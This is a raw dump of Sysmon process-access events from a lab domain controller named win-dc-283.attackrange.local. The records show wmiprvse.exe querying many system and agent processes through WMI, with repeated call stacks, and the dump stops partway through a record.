16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program 